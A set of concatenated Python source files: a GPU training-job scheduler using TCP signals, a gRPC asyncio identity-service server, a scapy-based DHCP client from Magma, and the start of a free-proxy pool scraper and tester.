overhead[str(item)] = 0
ovhd_start = {} # initialize this to 0 as well
for item in queue:
ovhd_start[str(item)] = 0
num_mig = {} # initialize migration time to 0
for item in queue:
num_mig[str(item)] = 0
queue_start = {} # initialize this to 0 as well
for item in queue:
queue_start[str(item)] = 0
queue_time = {} # initialize this to 0 as well
for item in queue:
queue_time[str(item)] = 0
index = 0
K80_cap = 8
K80_used = 0
qualified_jobs = 0
K80_job = {}
for i in range(8):
K80_job[str(i)] = 'idle'
qualified_job = []
pc_job = [] # list of jobs that are practically completed
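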
K80_node = 'c2180'
host_node = 'c0173'
testcase = args.tc
### also, change .h5 file folder in jobs ###
INTERVAL = 30 # make decision every 30s
QUALIFY_TIME = 300 # 300s (5 min) qualification threshold before a job can be promoted
def send_signal(node, cmd):
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
port = 10000 if node == K80_node else 10001
# Connect the socket to the port where the server is listening
server_address = (node, int(port))
print('connecting to {} port {}'.format(*server_address))
sock.connect(server_address)
try:
# Send data
message = cmd.encode('utf-8') # e.g. b'save 35' or b'start 35 gpu 6'
print('sending {!r}'.format(message))
sock.sendall(message)
while True:
data = sock.recv(32)
if 'success' in data.decode('utf-8'):
print('received {!r}'.format(data))
break
else:
print('waiting for success signal')
time.sleep(1)
finally:
#print('closing socket')
sock.close()
def save_job(node, job): # save_job('c2176', '50')
# first wait for the job to be qualified for checkpointing
while True: # wait for ckpt_qual to be available
global ckpt_qual_dict
if ckpt_qual_dict['job'+job] == 1:
ckpt_qual_dict['job'+job] = 0
break
time.sleep(5)
send_signal(node, 'save ' + job)
global ovhd_start
ovhd_start[job] = time.time()
# after sending checkpoint signal, wait for it to finish
while True:
time.sleep(5)
with open('checkpoint.json', 'r') as fp2:
checkpoint_dict = json.load(fp2)
if checkpoint_dict['job'+job] == 1: # checkpoint has finished
print('checkpointed successfully')
checkpoint_dict['job'+job] = 0 # reset it
json_file = json.dumps(checkpoint_dict)
with open('checkpoint.json', 'w') as fp2:
fp2.write(json_file)
break
# also check if job has already finished
global finish_dict
if finish_dict['job'+job] == 1:
break
# resume job
def resume_job(node, gpu, job): # resume_job('c2176', '3', '50')
while True:
if os.path.exists('pid.json'):
os.rename('pid.json', 'pid_lock.json')
break
else:
time.sleep(1)
cmd = 'resume ' + job + ' gpu ' + gpu
send_signal(node, cmd)
while True:
if os.path.exists('pid.json'):
break
else:
time.sleep(1)
# start job
def start_job(node, gpu, job):
# first wait for pid.json to show up, rename pid.json to pid_lock.json
# then in jobx.py, modify pid_lock.json, rename it to pid.json
# then wait for pid.json to show up
while True:
if os.path.exists('pid.json'):
os.rename('pid.json', 'pid_lock.json')
break
else:
time.sleep(1)
cmd = 'start ' + job + ' gpu ' + gpu
send_signal(node, cmd)
while True:
if os.path.exists('pid.json'):
break
else:
time.sleep(1)
############### first reset the per-job status records (pid, checkpoint, ckpt_qual, finish, epoch_waste) ####################
pid_dict = {}
with open('pid.json', 'r') as fp:
pid_dict = json.load(fp)
for key in pid_dict:
pid_dict[key] = 0
json_file = json.dumps(pid_dict)
with open('pid.json', 'w') as fp:
fp.write(json_file)
checkpoint_dict = {}
with open('checkpoint.json', 'r') as fp:
checkpoint_dict = json.load(fp)
for key in checkpoint_dict:
checkpoint_dict[key] = 0
json_file = json.dumps(checkpoint_dict)
with open('checkpoint.json', 'w') as fp:
fp.write(json_file)
ckpt_qual_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
ckpt_qual_dict[job_name] = 0
finish_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
finish_dict[job_name] = 0
epoch_waste_dict = {}
with open('epoch_waste.json', 'r') as fp:
epoch_waste_dict = json.load(fp)
for key in epoch_waste_dict:
epoch_waste_dict[key] = 0
json_file = json.dumps(epoch_waste_dict)
with open('epoch_waste.json', 'w') as fp:
fp.write(json_file)
#################### background thread running TCP socket ########################
def thread_function():
# here listen on the socket
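# Job scripts report back over TCP on port 10002 with messages of the form '<jobname> <event>', e.g. 'job12 ckpt_qual' or 'job12 finish'; each message is acknowledged with b'success'.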
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (host_node, 10002)
print('starting up on {} port {}'.format(*server_address))
sock.bind(server_address)
sock.listen(5)
while True:
# Wait for a connection
connection, client_address = sock.accept()
try:
while True:
data = connection.recv(32)
if data:
data_str = data.decode('utf-8')
if 'param' in data_str:
pass
elif 'ckpt_qual' in data_str:
global ckpt_qual_dict
job_name = data_str.split(' ')[0]
ckpt_qual_dict[job_name] = 1
elif 'finish' in data_str:
global finish_dict
job_name = data_str.split(' ')[0]
finish_dict[job_name] = 1
print('received ' + data_str)
connection.sendall(b'success')
#time.sleep(5)
else:
break
finally:
connection.close()
x = threading.Thread(target=thread_function, daemon=True)
x.start()
###############################################################################
######################################################################
while True:
# termination condition:
# all the jobs have finished
################### check for finished jobs on K80 ##############################
for gpu, job in K80_job.items():
if job != 'idle':
if finish_dict['job'+job] == 1:
K80_used -= 1
K80_job[gpu] = 'idle'
print('K80 finished job: ' + job)
JCT[job] = int(time.time() - job_start[job])
elif ovhd_start[job] != 0:
# check if ckpt overhead has finished
if ckpt_qual_dict['job'+job] == 1:
overhead[job] += int(time.time() - ovhd_start[job])
ovhd_start[job] = 0
################ check run time of current K80 job, update qualified_job #################
for job in list(K80_job.values()):
if job not in qualified_job and job != 'idle':
runtime = int(time.time() - job_start[job])
if runtime >= QUALIFY_TIME:
qualified_job.append(job)
print('job' + job + ' has been qualified for promotion')
################ make promotion decisions ########################
K80_free = K80_cap - K80_used
################ submit new jobs to vacant K80 GPUs ############################
# check if there are vacant K80s
## yes: submit jobs from queue
## no: do nothing
if K80_used < K80_cap:
K80_free = K80_cap - K80_used
for i in range(K80_free):
time_passed = int(time.time() - queue_timer)
if index < len(queue) and queue_dict[queue[index]] < time_passed: # make sure job has arrived in the queue
job_new = str(queue[index])
for gpu, job in K80_job.items():
if job == 'idle': # schedule new job here if idle
start_job(K80_node, gpu, job_new)
K80_job[gpu] = job_new
job_start[job_new] = time.time()
index += 1
K80_used += 1
time.sleep(5) # don't communicate too often
break
############### wait for next iteration
time.sleep(INTERVAL)
################ check if termination condition is met ################
K80_idle_num = sum(value == 'idle' for value in K80_job.values())
if K80_idle_num == K80_cap and index == len(queue):
print('all jobs are finished!')
break
# get average JCT
average_JCT = np.average(list(JCT.values()))
JCT['average'] = average_JCT
average_overhead = np.average(list(overhead.values()))
overhead['average'] = average_overhead
# after everything is finished
with open('epoch_waste.json', 'r') as fp:
epoch_waste_dict = json.load(fp)
print('finished all runs')
JCT_name = testcase + '_JCT.json'
overhead_name = testcase + '_overhead.json'
num_mig_name = testcase + '_num_mig.json'
epoch_waste_name = testcase + '_epoch_waste.json'
ckpt_qual_name = 'ckpt_qual.json'
finish_name = 'finish.json'
with open(JCT_name, 'w') as fp1:
json.dump(JCT, fp1, sort_keys=True, indent=4)
with open(overhead_name, 'w') as fp3:
json.dump(overhead, fp3, sort_keys=True, indent=4)
with open(num_mig_name, 'w') as fp3:
json.dump(num_mig, fp3, sort_keys=True, indent=4)
with open(epoch_waste_name, 'w') as fp3:
json.dump(epoch_waste_dict, fp3, sort_keys=True, indent=4)
with open(ckpt_qual_name, 'w') as fp1:
json.dump(ckpt_qual_dict, fp1, sort_keys=True, indent=4)
with open(finish_name, 'w') as fp1:
json.dump(finish_dict, fp1, sort_keys=True, indent=4)
|
server.py
|
#######
# https://gist.github.com/seglberg/0b4487b57b4fd425c56ad72aba9971be
#######
import asyncio
from concurrent import futures
import functools
import threading
import os
import sys
import inspect
import grpc
import time
from grpc import _server
import logging
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.DEBUG)
ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(os.path.abspath(ROOT_DIR+'/identityLayer'))
sys.path.append(os.path.abspath(ROOT_DIR))
from identityLayer import identitylayer_pb2
from identityLayer import identitylayer_pb2_grpc
from anoncreds_service import AnoncredsServiceServicer
from blob_storage_service import BlobStorageServiceServicer
from crypto_service import CryptoServiceServicer
from did_service import DidServiceServicer
from ledger_service import LedgerServiceServicer
from non_secret_service import NonSecretServiceServicer
from pairwise_service import PairwiseServiceServicer
from pool_service import PoolServiceServicer
from wallet_service import WalletServiceServicer
_ONE_DAY_IN_SECONDS = 60 * 60 * 24
def _loop_mgr(loop: asyncio.AbstractEventLoop):
asyncio.set_event_loop(loop)
loop.run_forever()
# If we reach here, the loop was stopped.
# We should gather any remaining tasks and finish them.
pending = asyncio.Task.all_tasks(loop=loop)
if pending:
loop.run_until_complete(asyncio.gather(*pending))
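# AsyncioExecutor bridges gRPC's thread-pool-style executor API onto a background asyncio event loop: coroutine handlers are scheduled with run_coroutine_threadsafe, plain callables fall back to the loop's default executor.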
class AsyncioExecutor(futures.Executor):
def __init__(self, *, loop=None):
super().__init__()
self._shutdown = False
self._loop = loop or asyncio.get_event_loop()
self._thread = threading.Thread(target=_loop_mgr, args=(self._loop,),
daemon=True)
self._thread.start()
def submit(self, fn, *args, **kwargs):
if self._shutdown:
raise RuntimeError('Cannot schedule new futures after shutdown')
if not self._loop.is_running():
raise RuntimeError("Loop must be started before any function can "
"be submitted")
if inspect.iscoroutinefunction(fn):
coro = fn(*args, **kwargs)
return asyncio.run_coroutine_threadsafe(coro, self._loop)
else:
func = functools.partial(fn, *args, **kwargs)
return self._loop.run_in_executor(None, func)
def shutdown(self, wait=True):
self._loop.stop()
self._shutdown = True
if wait:
self._thread.join()
# --------------------------------------------------------------------------- #
async def _call_behavior(rpc_event, state, behavior, argument, request_deserializer):
context = _server._Context(rpc_event, state, request_deserializer)
try:
return await behavior(argument, context), True
except Exception as e: # pylint: disable=broad-except
with state.condition:
if e not in state.rpc_errors:
details = 'Exception calling application: {}'.format(e)
_server.logging.exception(details)
_server._abort(state, rpc_event.operation_call,
_server.cygrpc.StatusCode.unknown, _server._common.encode(details))
return None, False
async def _take_response_from_response_iterator(rpc_event, state, response_iterator):
try:
return await response_iterator.__anext__(), True
except StopAsyncIteration:
return None, True
except Exception as e: # pylint: disable=broad-except
with state.condition:
if e not in state.rpc_errors:
details = 'Exception iterating responses: {}'.format(e)
_server.logging.exception(details)
_server._abort(state, rpc_event.operation_call,
_server.cygrpc.StatusCode.unknown, _server._common.encode(details))
return None, False
async def _unary_response_in_pool(rpc_event, state, behavior, argument_thunk, request_deserializer, response_serializer):
argument = argument_thunk()
if argument is not None:
response, proceed = await _call_behavior(rpc_event, state, behavior,
argument, request_deserializer)
if proceed:
serialized_response = _server._serialize_response(
rpc_event, state, response, response_serializer)
if serialized_response is not None:
_server._status(rpc_event, state, serialized_response)
async def _stream_response_in_pool(rpc_event, state, behavior, argument_thunk, request_deserializer, response_serializer):
argument = argument_thunk()
if argument is not None:
# Notice this calls the normal `_call_behavior` not the awaitable version.
response_iterator, proceed = _server._call_behavior(
rpc_event, state, behavior, argument, request_deserializer)
if proceed:
while True:
response, proceed = await _take_response_from_response_iterator(
rpc_event, state, response_iterator)
if proceed:
if response is None:
_server._status(rpc_event, state, None)
break
else:
serialized_response = _server._serialize_response(
rpc_event, state, response, response_serializer)
print(response)
if serialized_response is not None:
print("Serialized Correctly")
proceed = _server._send_response(rpc_event, state,
serialized_response)
if not proceed:
break
else:
break
else:
break
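# Monkey-patch grpc's internal response handlers with the awaitable-aware versions above, so coroutine servicer methods submitted via AsyncioExecutor are awaited instead of being returned as bare coroutine objects.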
_server._unary_response_in_pool = _unary_response_in_pool
_server._stream_response_in_pool = _stream_response_in_pool
if __name__ == '__main__':
server = grpc.server(AsyncioExecutor())
identitylayer_pb2_grpc.add_NonSecretServiceServicer_to_server(NonSecretServiceServicer(), server)
identitylayer_pb2_grpc.add_LedgerServiceServicer_to_server(LedgerServiceServicer(), server)
identitylayer_pb2_grpc.add_DidServiceServicer_to_server(DidServiceServicer(), server)
identitylayer_pb2_grpc.add_PairwiseServiceServicer_to_server(PairwiseServiceServicer(), server)
identitylayer_pb2_grpc.add_CryptoServiceServicer_to_server(CryptoServiceServicer(), server)
identitylayer_pb2_grpc.add_PoolServiceServicer_to_server(PoolServiceServicer(), server)
identitylayer_pb2_grpc.add_AnoncredsServiceServicer_to_server(AnoncredsServiceServicer(), server)
identitylayer_pb2_grpc.add_WalletServiceServicer_to_server(WalletServiceServicer(), server)
identitylayer_pb2_grpc.add_BlobStorageServiceServicer_to_server(BlobStorageServiceServicer(), server)
server.add_insecure_port('[::]:50051')
server.start()
try:
logger.debug("Started `miu` Server on port :50051")
while True:
time.sleep(_ONE_DAY_IN_SECONDS)
except KeyboardInterrupt:
logger.debug("Stopped `miu` server.")
server.stop(0)
|
dhcp_client.py
|
"""
Copyright 2020 The Magma Authors.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Allocates IP address as per DHCP server in the uplink network.
"""
import datetime
import logging
import threading
import time
from ipaddress import IPv4Network, ip_address
from threading import Condition
from typing import MutableMapping, Optional
from magma.mobilityd.dhcp_desc import DHCPDescriptor, DHCPState
from magma.mobilityd.mac import MacAddress, hex_to_mac
from magma.mobilityd.uplink_gw import UplinkGatewayInfo
from scapy.all import AsyncSniffer
from scapy.layers.dhcp import BOOTP, DHCP
from scapy.layers.inet import IP, UDP
from scapy.layers.l2 import Dot1Q, Ether
from scapy.sendrecv import sendp
LOG = logging.getLogger('mobilityd.dhcp.sniff')
DHCP_ACTIVE_STATES = [DHCPState.ACK, DHCPState.OFFER]
class DHCPClient:
THREAD_YIELD_TIME = .1
def __init__(self,
dhcp_store: MutableMapping[str, DHCPDescriptor],
gw_info: UplinkGatewayInfo,
dhcp_wait: Condition,
iface: str = "dhcp0",
lease_renew_wait_min: int = 200):
"""
Implement DHCP client to allocate IP for given Mac address.
DHCP client state is maintained in user provided hash table.
Args:
dhcp_store: maintain DHCP transactions, key is mac address.
gw_info: stores GW IP info from DHCP server
dhcp_wait: notify users on new DHCP packet
iface: DHCP egress and ingress interface.
"""
self._sniffer = AsyncSniffer(iface=iface,
filter="udp and (port 67 or 68)",
store=False,
prn=self._rx_dhcp_pkt)
self.dhcp_client_state = dhcp_store # mac => DHCP_State
self.dhcp_gw_info = gw_info
self._dhcp_notify = dhcp_wait
self._dhcp_interface = iface
self._msg_xid = 0
self._lease_renew_wait_min = lease_renew_wait_min
self._monitor_thread = threading.Thread(target=self._monitor_dhcp_state)
self._monitor_thread.daemon = True
self._monitor_thread_event = threading.Event()
def run(self):
"""
Start DHCP sniffer thread.
This initializes state required for the DHCP sniffer thread and starts it.
Returns: None
"""
self._sniffer.start()
LOG.info("DHCP sniffer started")
# give it time to schedule the thread and start sniffing.
time.sleep(self.THREAD_YIELD_TIME)
self._monitor_thread.start()
def stop(self):
self._sniffer.stop()
self._monitor_thread_event.set()
def send_dhcp_packet(self, mac: MacAddress, vlan: str,
state: DHCPState,
dhcp_desc: DHCPDescriptor = None):
"""
Send DHCP packet and record state in dhcp_client_state.
Args:
mac: MAC address of interface
state: state of DHCP packet
dhcp_desc: DHCP protocol state.
Returns:
"""
ciaddr = None
# generate DHCP request packet
if state == DHCPState.DISCOVER:
dhcp_opts = [("message-type", "discover")]
dhcp_desc = DHCPDescriptor(mac=mac, ip="", vlan=vlan,
state_requested=DHCPState.DISCOVER)
self._msg_xid = self._msg_xid + 1
pkt_xid = self._msg_xid
elif state == DHCPState.REQUEST:
dhcp_opts = [("message-type", "request"),
("requested_addr", dhcp_desc.ip),
("server_id", dhcp_desc.server_ip)]
dhcp_desc.state_requested = DHCPState.REQUEST
pkt_xid = dhcp_desc.xid
ciaddr = dhcp_desc.ip
elif state == DHCPState.RELEASE:
dhcp_opts = [("message-type", "release"),
("server_id", dhcp_desc.server_ip)]
dhcp_desc.state_requested = DHCPState.RELEASE
self._msg_xid = self._msg_xid + 1
pkt_xid = self._msg_xid
ciaddr = dhcp_desc.ip
else:
LOG.warning("Unknown egress request mac %s state %s", str(mac), state)
return
dhcp_opts.append("end")
dhcp_desc.xid = pkt_xid
with self._dhcp_notify:
self.dhcp_client_state[mac.as_redis_key(vlan)] = dhcp_desc
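# Build the outgoing DHCP frame: L2 broadcast from the client MAC, an optional 802.1Q tag, IP 0.0.0.0 -> 255.255.255.255, UDP client port 68 -> server port 67, then the BOOTP/DHCP payload.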
pkt = Ether(src=str(mac), dst="ff:ff:ff:ff:ff:ff")
if vlan and vlan != "0":
pkt /= Dot1Q(vlan=int(vlan))
pkt /= IP(src="0.0.0.0", dst="255.255.255.255")
pkt /= UDP(sport=68, dport=67)
pkt /= BOOTP(op=1, chaddr=mac.as_hex(), xid=pkt_xid, ciaddr=ciaddr)
pkt /= DHCP(options=dhcp_opts)
LOG.debug("DHCP pkt xmit %s", pkt.show(dump=True))
sendp(pkt, iface=self._dhcp_interface, verbose=0)
def get_dhcp_desc(self, mac: MacAddress, vlan: str) -> Optional[DHCPDescriptor]:
"""
Get DHCP description for given MAC.
Args:
mac: Mac address of the client
vlan: vlan id if the IP allocated in a VLAN
Returns: Current DHCP info.
"""
key = mac.as_redis_key(vlan)
if key in self.dhcp_client_state:
return self.dhcp_client_state[key]
LOG.debug("lookup error for %s", str(key))
return None
def release_ip_address(self, mac: MacAddress, vlan: str):
"""
Release DHCP allocated IP.
Args:
mac: MAC address of the IP allocated.
vlan: vlan id if the IP allocated in a VLAN
Returns: None
"""
key = mac.as_redis_key(vlan)
if key not in self.dhcp_client_state:
LOG.error("Unallocated DHCP release for MAC: %s", key)
return
dhcp_desc = self.dhcp_client_state[key]
self.send_dhcp_packet(mac, dhcp_desc.vlan, DHCPState.RELEASE, dhcp_desc)
del self.dhcp_client_state[key]
def _monitor_dhcp_state(self):
"""
monitor DHCP client state.
"""
while True:
wait_time = self._lease_renew_wait_min
with self._dhcp_notify:
for dhcp_record in self.dhcp_client_state.values():
logging.debug("monitor: %s", dhcp_record)
# Only process active records.
if dhcp_record.state not in DHCP_ACTIVE_STATES:
continue
now = datetime.datetime.now()
logging.debug("monitor time: %s", now)
request_state = DHCPState.REQUEST
# in case of lost DHCP lease rediscover it.
if now >= dhcp_record.lease_expiration_time:
request_state = DHCPState.DISCOVER
if now >= dhcp_record.lease_renew_deadline:
logging.debug("sending lease renewal")
self.send_dhcp_packet(dhcp_record.mac, dhcp_record.vlan,
request_state, dhcp_record)
else:
# Find next renewal wait time.
time_to_renew = dhcp_record.lease_renew_deadline - now
wait_time = min(wait_time, time_to_renew.total_seconds())
# never wait less than the configured minimum renew interval
wait_time = max(wait_time, self._lease_renew_wait_min)
logging.debug("lease renewal check after: %s sec" % wait_time)
self._monitor_thread_event.wait(wait_time)
if self._monitor_thread_event.is_set():
break
@staticmethod
def _get_option(packet, name):
for opt in packet[DHCP].options:
if opt[0] == name:
return opt[1]
return None
def _process_dhcp_pkt(self, packet, state: DHCPState):
LOG.debug("DHCP pkt recv %s", packet.show(dump=True))
mac_addr = MacAddress(hex_to_mac(packet[BOOTP].chaddr.hex()[0:12]))
vlan = ""
if Dot1Q in packet:
vlan = str(packet[Dot1Q].vlan)
mac_addr_key = mac_addr.as_redis_key(vlan)
with self._dhcp_notify:
if mac_addr_key in self.dhcp_client_state:
state_requested = self.dhcp_client_state[mac_addr_key].state_requested
if BOOTP not in packet or packet[BOOTP].yiaddr is None:
LOG.error("no ip offered")
return
ip_offered = packet[BOOTP].yiaddr
subnet_mask = self._get_option(packet, "subnet_mask")
if subnet_mask is not None:
ip_subnet = IPv4Network(ip_offered + "/" + subnet_mask, strict=False)
else:
ip_subnet = IPv4Network(ip_offered + "/" + "32", strict=False)
dhcp_server_ip = None
if IP in packet:
dhcp_server_ip = packet[IP].src
dhcp_router_opt = self._get_option(packet, "router")
if dhcp_router_opt is not None:
router_ip_addr = ip_address(dhcp_router_opt)
else:
# use the DHCP server as the upstream router when Option 3 (router) is missing.
router_ip_addr = dhcp_server_ip
self.dhcp_gw_info.update_ip(router_ip_addr, vlan)
lease_expiration_time = self._get_option(packet, "lease_time")
dhcp_state = DHCPDescriptor(mac=mac_addr,
ip=ip_offered,
state=state,
vlan=vlan,
state_requested=state_requested,
subnet=str(ip_subnet),
server_ip=dhcp_server_ip,
router_ip=router_ip_addr,
lease_expiration_time=lease_expiration_time,
xid=packet[BOOTP].xid)
LOG.info("Record DHCP for: %s state: %s", mac_addr_key, dhcp_state)
self.dhcp_client_state[mac_addr_key] = dhcp_state
self._dhcp_notify.notifyAll()
if state == DHCPState.OFFER:
# let other thread work on fulfilling IP allocation request.
threading.Event().wait(self.THREAD_YIELD_TIME)
self.send_dhcp_packet(mac_addr, vlan, DHCPState.REQUEST, dhcp_state)
else:
LOG.debug("Unknown MAC: %s " % packet.summary())
return
# ref: https://fossies.org/linux/scapy/scapy/layers/dhcp.py
def _rx_dhcp_pkt(self, packet):
if DHCP not in packet:
return
# Match DHCP offer
if packet[DHCP].options[0][1] == int(DHCPState.OFFER):
self._process_dhcp_pkt(packet, DHCPState.OFFER)
# Match DHCP ack
elif packet[DHCP].options[0][1] == int(DHCPState.ACK):
self._process_dhcp_pkt(packet, DHCPState.ACK)
# TODO handle other DHCP protocol events.
|
getproxy.py
|
# -*- coding: utf-8 -*-
# @Author: gunjianpan
# @Date: 2019-06-06 17:15:37
# @Last Modified by: gunjianpan
# @Last Modified time: 2019-07-26 21:56:43
import argparse
import codecs
import functools
import http.cookiejar as cj
import os
import random
import re
import threading
import time
import requests
import sys
sys.path.append(os.getcwd())
from apscheduler.schedulers.blocking import BlockingScheduler
from bs4 import BeautifulSoup
from util.db import Db
from util.util import begin_time, end_time, changeJsonTimeout, changeHtmlTimeout, basic_req, time_str, can_retry, echo
"""
* www.proxyserverlist24.top
* www.live-socks.net
* gatherproxy.com
* goubanjia.com
xicidaili.com
data5u.com
66ip.com
kuaidaili.com
.data/
├── gatherproxy // gather proxy list
└── passage // gather passage
"""
data_dir = 'proxy/data/'
MAXN = 0x3fffffff
type_map = {1: 'https', 0: 'http'}
class GetFreeProxy:
''' proxy pool '''
def __init__(self):
self.Db = Db("proxy")
self.insert_sql = '''INSERT INTO ip_proxy( `address`, `http_type`) VALUES %s '''
self.select_list = '''SELECT address, http_type from ip_proxy WHERE `is_failured` = 0'''
self.select_sql = '''SELECT `id`, address, `is_failured` from ip_proxy WHERE `address` in %s '''
self.select_all = '''SELECT `address`, `http_type` from ip_proxy WHERE `is_failured` != 5 and http_type in %s'''
self.replace_ip = '''REPLACE INTO ip_proxy(`id`, `address`, `http_type`, `is_failured`) VALUES %s'''
self.canuseip = {}
self.waitjudge = []
self.cannotuseip = {}
self.failuredtime = {}
self.canuse_proxies = []
self.initproxy()
def proxy_req(self, url:str, types:int, data=None, test_func=None, header=None):
"""
use a proxy to send requests, and record proxies that can not be used
@types S0XY: X=0.->get; =1.->post;
Y=0.->html; =1.->json; =2.->basic
S=0.->basic; =1.->ss
supports retry on failure && automatic recording of failed proxies
"""
httptype = url[4] == 's'
ss_type = types // 1000
types %= 1000
if ss_type:
proxylist = self.proxylists_ss if httptype else self.proxylist_ss
else:
proxylist = self.proxylists if httptype else self.proxylist
if not len(proxylist):
if self.Db.db:
echo(0, 'Proxy pool empty!!! Please check the db conn & db dataset!!!')
proxies = {}
else:
index = random.randint(0, len(proxylist) - 1)
proxies_url = proxylist[index]
proxies = {type_map[httptype]: proxies_url}
try:
result = basic_req(url, types, proxies, data, header)
if not test_func is None:
if not test_func(result):
if self.check_retry(url):
self.proxy_req(url, types + 1000 * ss_type, data, test_func)
else:
self.failuredtime[url] = 0
return
else:
return result
else:
return result
except:
self.cannotuseip[random.randint(0, MAXN)] = proxies_url
if proxies_url in proxylist:
proxylist.remove(proxies_url) # remove() takes the value, not an index
if not len(self.cannotuseip.keys()) % 10:
self.cleancannotuse()
if self.check_retry(url):
self.proxy_req(url, types + 1000 * ss_type, data, test_func)
else:
return
def check_retry(self, url):
"""
check whether the failed url may still be retried (at most 3 retries per url)
"""
if url not in self.failuredtime:
self.failuredtime[url] = 0
return True
elif self.failuredtime[url] < 3:
self.failuredtime[url] += 1
return True
else:
self.log_write(url)
self.failuredtime[url] = 0
return False
def log_write(self, url):
"""
failure log
"""
with codecs.open("proxy.log", 'a', encoding='utf-8') as f:
f.write(time_str()+ url + '\n')
def insertproxy(self, insertlist):
"""
insert data to db
"""
results = self.Db.insert_db(self.insert_sql % str(insertlist)[1:-1])
if results:
echo(2, 'Insert ' + str(len(insertlist)) + ' items Success!')
else:
pass
def updateproxy(self, updatelist, types):
"""
update data to db
"""
results = self.Db.update_db(self.replace_ip % str(updatelist)[1:-1])
typemap = {0: 'can use ', 1: 'can not use '}
if results:
echo(2, 'Update', typemap[types],str(len(updatelist)),' items Success!')
else:
pass
def selectproxy(self, targetlist):
"""
select ip proxy by ids
"""
if not len(targetlist):
return []
elif len(targetlist) == 1:
waitlist = '(\'' + targetlist[0] + '\')'
else:
waitlist = tuple(targetlist)
return self.Db.select_db(self.select_sql % str(waitlist))
def dbcanuseproxy(self):
"""
check whether the db already contains these proxies
"""
results = self.selectproxy([ii[0] for ii in self.canuseip.values()])
ss_len = len([1 for ii in self.canuseip.values() if ii[1] > 1])
echo(2, "SS proxies %d"%ss_len)
insertlist = []
updatelist = []
ipmap = {}
if results != False:
for ip_info in results:
ipmap[ip_info[1]] = [ip_info[0], ip_info[2]]
for ip_now in self.canuseip.values():
http_type = ip_now[1]
ip_now = ip_now[0]
if ip_now in ipmap:
if ipmap[ip_now][1]:
updatelist.append(
(ipmap[ip_now][0], ip_now, http_type, 0))
else:
insertlist.append((ip_now, http_type))
if len(insertlist):
self.insertproxy(insertlist)
if len(updatelist):
self.updateproxy(updatelist, 0)
else:
pass
self.canuseip = {}
def cleancannotuse(self):
"""
mark proxies that can not be used in the db (increment their failure count)
"""
results = self.selectproxy(self.cannotuseip.values())
updatelist = []
ipmap = {}
if results:
for ip_info in results:
ipmap[ip_info[1]] = [ip_info[0], ip_info[2]]
for ip_now in self.cannotuseip.values():
http_type = ip_now[4] == 's'
if ip_now in ipmap:
updatelist.append(
(ipmap[ip_now][0], ip_now, http_type, ipmap[ip_now][1] + 1))
if len(updatelist):
self.updateproxy(updatelist, 1)
else:
pass
self.cannotuseip = {}
def initproxy(self):
"""
init proxy list
"""
results = self.Db.select_db(self.select_list)
self.proxylist = []
self.proxylists = []
self.proxylist_ss = []
self.proxylists_ss = []
if not results:
echo(0, 'Please check the db configuration!!! The proxy pool can not be used!!!>>>')
return
for index in results:
if index[1] == 1:
self.proxylists.append(index[0])
elif index[1] == 2:
self.proxylist.append(index[0])
self.proxylist_ss.append(index[0])
elif index[1] == 3:
self.proxylists.append(index[0])
self.proxylists_ss.append(index[0])
else:
self.proxylist.append(index[0])
echo(2, len(self.proxylist), ' http proxy can use.')
echo(2, len(self.proxylists), ' https proxy can use.')
echo(2, len(self.proxylist_ss), ' ss http proxy can use.')
echo(2, len(self.proxylists_ss), ' ss https proxy can use.')
def judgeurl(self, urls, index, times, ss_test=False):
"""
use /api/playlist to judge http proxies; use /discover/playlist to judge https proxies
1. the request must not time out (timeout = 5s)
2. response['result']['tracks'] must have the expected length
"""
http_type = urls[4] == 's'
proxies = {type_map[http_type]: urls}
test_url = type_map[http_type] + '://music.163.com/api/playlist/detail?id=432853362'
ss_url = 'https://www.google.com/?gws_rd=ssl'
try:
data = basic_req(test_url, 1, proxies)
result = data['result']
tracks = result['tracks']
if len(tracks) == 56:
if times < 0:
self.judgeurl(urls, index, times + 1)
else:
echo(1, urls, proxies, 'Proxies can use.')
self.canuse_proxies.append(urls)
self.canuseip[index] = [urls, int(http_type)]
if ss_test:
data = basic_req(ss_url, 0)
if len(str(data)) > 5000:
self.canuseip[index] = [urls, int(http_type) + 2]
else:
echo(0, urls, proxies, 'Tracks len error ^--<^>--^ ')
self.cannotuseip[index] = urls
except:
echo(0, urls, proxies, 'return error [][][][][][]')
if not index in self.canuseip:
self.cannotuseip[index] = urls
pass
def threadjude(self, batch_size=500):
"""
judge proxies concurrently, batch_size threads at a time
"""
changeJsonTimeout(2)
changeHtmlTimeout(3)
text = self.waitjudge
num = len(text)
for block in range(num // batch_size + 1):
blockthreads = []
for index in range(block * batch_size, min(num, batch_size * (block + 1))):
work = threading.Thread(
target=self.judgeurl, args=(text[index],index, 0,))
blockthreads.append(work)
for work in blockthreads:
work.start()
for work in blockthreads:
work.join()
self.dbcanuseproxy()
self.cleancannotuse()
self.waitjudge = []
def testdb(self, types):
'''
test whether the proxies stored in the db are still usable
'''
version = begin_time()
typestr = ''
if types == 2:
typestr = '(0,1,2,3)'
elif types == 1:
typestr = '(1,3)'
else:
typestr = '(0,2)'
results = self.Db.select_db(self.select_all % typestr)
if results != 0:
for index in results:
self.waitjudge.append(index[0])
self.threadjude()
else:
pass
self.initproxy()
end_time(version)
def xiciproxy(self, page):
"""
xici proxy http://www.xicidaili.com/nn/{page}
The first proxy site I used, but most of its proxies no longer work.
"""
if not str(page).isdigit():
echo(0, "Please input num!")
return []
version = begin_time()
url = 'http://www.xicidaili.com/nn/%d'
for index in range(1, page + 1):
html = basic_req(url%(index), 0)
tem = html.find_all('tr')
for index in range(1, len(tem)):
tds = tem[index].find_all('td')
ip = tds[5].text.lower()
self.waitjudge.append(
ip + '://' + tds[1].text + ':' + tds[2].text)
self.threadjude()
end_time(version)
def gatherproxy(self, types):
"""
:100: very nice website
first of all you should download proxy ip txt from:
http://www.gatherproxy.com/zh/proxylist/country/?c=China
"""
if not os.path.exists('{}gatherproxy'.format(data_dir)):
echo(0, 'Gather file not exist!!!')
return
